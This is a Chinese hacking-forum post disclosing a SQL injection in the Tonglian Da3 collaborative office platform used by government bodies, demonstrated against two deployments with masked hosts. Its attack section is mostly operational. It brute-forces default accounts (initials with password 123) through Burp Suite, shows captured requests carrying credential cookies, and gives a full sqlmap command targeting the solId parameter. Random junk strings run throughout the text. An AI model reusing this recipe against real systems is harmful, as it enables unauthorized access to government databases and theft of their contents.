找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1550|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 @$ z* w& i" R" X
) `1 j6 w3 H& [ Q/ W, T4 a# T

) T' }: ]$ f2 C4 u1 ~1 Z5 L

6 h V3 V6 B4 b# s 平台简介:$ B' p6 v- I2 N1 p

+ L" Z# [5 f' i

/ ]% R6 B8 V- \9 ?  0 ^ [1 N7 F. J; t

1 N9 Z- i Q8 K0 \. X R- n) Z

5 O# }' M4 o- q+ Z- ]$ n 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! h q3 Q8 {3 t/ R; [' C9 X. h同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* ^, g1 Y8 ~# _6 b: `' ], ~7 ?同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! " S: u% S t5 ?) o; s* K' N

% g0 l$ ]; A( |+ l5 i

2 A6 o# p# Z$ m9 R$ |  & I G8 ^2 E9 m+ q0 S& E2 _& w# z

, o( t- Q% F: |# H6 _& V5 N

$ O, t; s [+ V6 Q" n! t 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:* h/ p" z8 F$ h6 ^( h. m. c4 J

% V1 p' C; J3 ]

. B: ^7 I. y8 N  . ^* s& F3 M0 a3 [& ?( |) c$ Y

/ ~$ d+ ^" C1 M2 E0 b

3 w) i; k# Y" a2 a: Q3 u# [ http://1.1.1.1:7197/cap-aco/#(案例2-)2 H ], K1 X( W

- H+ z$ G6 Y7 U5 K# E& C( d# P' o

' {# }) i2 x2 w5 S- k http://www.XXOO.com (案例1-官网网站)1 o/ T; V7 j/ {( v

1 } I% i1 ^. v7 } ]2 J3 R

+ \% H6 y8 d" b$ Q   / i& O/ ^ f8 |: e6 v

- c3 X, q; c4 N' x7 ^$ a

& W' B" L5 j t# v ^- y3 S; B 漏洞详情:5 x; q% [0 `* N" e0 Y9 `1 a2 a

, Z7 U$ j$ \0 _+ P2 i) Y# ~+ r) z

/ E' j' [, A& k! B; u* C  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 % {+ {- l; P: \7 O9 U

. B$ t4 g/ |1 y& A% x

+ J) ?( Q" x d# x      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: # |. N& e5 y9 S5 J$ L* b" Q

. o/ s0 P* W" Q

2 w. Z8 X! T& P& L1 z  / @6 d* i( W6 s5 n9 G: A7 Q

4 C* f- M" o" O( G) W) T

6 p; F. e. e# `6 j+ e1 Y   5 ~$ p& S5 Z2 `4 C4 w- [

# ~' ^2 j1 T# X

3 k* V! M5 K7 `* X, p status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:% o8 Z9 ?4 \: K- t& V' s" V

! r9 G) k, M& N7 d

$ u1 f3 C5 _2 U3 L2 l0 B, J 1、案例1-官方网站# P9 ? C; b0 |1 O4 T `' s

, z: G$ J9 R# ~' ]' A3 o2 T& n

- O6 _! n+ K( j2 i9 M# N0 m3 ~ GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1+ u7 \4 C; N. r' [* p/ q/ z# v

7 w5 v! ?# L# O) }

y$ s6 q# [4 C' j/ w Host: www.XXOO.com1 n( @2 p' r3 X# V+ g5 p

# Z2 H' _7 _1 W; O

. Q) ]7 P. V3 l+ O& J6 ~1 f5 S Proxy-Connection: Keep-Alive }' q/ P+ }* D5 Y0 ]5 Y( H3 G

% J( a4 y/ N0 h

" w" U- ?( C+ f, b+ i Accept: application/json, text/javascript, */*; q=0.01 d* u/ M; L0 V( H! ]& q

5 k8 l7 M' K; k" E( p6 R7 r

; g) R$ v; J: W8 E Accept-Language: zh-CN. S0 o% I( u# k, n: R Y$ c# I

4 k% P$ `. Z% J

& N5 a/ D$ d9 U) s& c; I Content-Type: application/json 9 X# L* V% f( ?$ R9 R1 U& R

6 v1 R; e. k. p9 _' |! e7 @

- L$ W& E: O( `/ n' s User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko3 i3 W n" p- u" o- p+ U

8 ^0 l3 R, |5 G' Z* E* d. a

; g* P" B; _, j( b) ^ X-Requested-With: XMLHttpRequest1 k# r: ~1 z# v9 M# m

7 ~. i# c. F. B2 c p5 D

6 u) o3 _% f8 ^7 h( z+ S Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002, g1 P! h8 J& ~' o7 {

3 c: a0 [1 C3 {3 Z3 ^' Y

/ c. Q* ^0 Y- A4 h* { Accept-Encoding: gzip, deflate, sdch " l5 J; ~3 R; F' e( v

7 [4 d* c( ^% Z% p5 E# L/ K

+ k* \1 W1 S6 _, C Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e 1 {0 B0 S4 ]; n- j/ P, T

7 q& K2 `( {1 H1 Q4 q: T% b

% }9 C9 E& ~3 ^. G 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:: m# K! m# \3 k) n3 K

* }$ X& x" P) H0 O. G

! B# C. y: f+ S6 Z+ s! Q3 ]3 x   $ @, T, y5 X2 M7 u0 |" x

8 n% r8 ? j( W* }6 U& U \' b

6 O O9 B$ S) Q0 e8 F. {  1 l/ u1 q0 ^, r: o

% u) m n9 R8 p0 U/ F; u' z

8 d7 ~) K# u3 z1 P1 }# M/ k" z" l* x   8 h5 Z U% a) p3 W. K( F- m

9 s0 r7 u- }% S8 |) _& h

# i) Y" ^4 M7 n* n: O+ T0 P  3 v- E' ^8 i% J' d

- ? v' c" Q* R' |. j% k

( d/ a: G( o( K3 A5 o( B  % _" ^* K7 v' S- c/ Z

# b7 l9 S% v% V

2 o4 i. `6 R# w' z 2、案例2-某天河云平台 7 x1 u7 b- a8 i* ]. j4 {

- R& G* ]+ O; G, ` O2 h x D. o

0 s- n/ ^% \3 _7 J" f1 o0 T GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 8 @# _0 ]+ F8 C0 a0 c9 i$ Z

' u; Y, b( a9 K& V

: \; I. j$ C5 R2 J Host: 1.1.1.:71975 D( g) P6 W8 v- B! U4 J

% B: O4 f: A3 n2 d! }9 b& {, c) N

& t" p8 j0 A" M" u; A Accept: application/json, text/javascript, */*; q=0.01 1 V, ]& j( l l

I; L, C( g1 U

4 ^- m: W/ V0 D+ U% }% D! R5 y+ [* Y X-Requested-With: XMLHttpRequest 8 x7 o: _8 W9 m1 W- s

# I9 `" t3 P6 w# x0 p- T3 ^5 [

G! F3 M( G6 f. v User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.00 p8 B1 C j, X* N& O+ I! Y

- ^+ ]6 t- a" k: _* o* T

0 F; ?$ h8 w+ }8 t Content-Type: application/json * k4 F: O b% f: j/ U

/ M& J' V7 x* C3 N

2 K( V4 G9 S1 Q1 R Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008( `2 m( [; E" M( s, @$ P( y) }% J

7 ]& f. g5 s+ L: J, v2 D

! F+ K& J7 ?& W t# u, B( ~6 @ Accept-Language: zh-CN,zh;q=0.8$ O F( C8 ~5 ?

$ Y& b# D7 g/ D

, y; d) Z! r& A+ M4 {0 [. K% o9 N# ^ Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1$ j# f) v+ h$ T9 H6 g

2 t2 O! t; |4 U9 t. V. K: y

/ H% \8 X. N" f( J) ^) Q Connection: close- F+ \" X& M8 o" W) c

1 I! q$ z2 n X3 N/ A

1 v# p. U9 R1 Q9 v" d2 Y 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:' K; M7 w6 K. U( _8 g( |

5 E/ i& R& W5 {9 @

' A& h9 f' w7 m0 e7 V   5 f$ w7 z3 q4 z7 ?5 \! ^6 p

9 m8 e4 a+ ]2 k0 N, n7 @6 @

3 }! K) ^/ C5 h9 M; g/ c
/ T3 F$ Y% G* Q' V

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表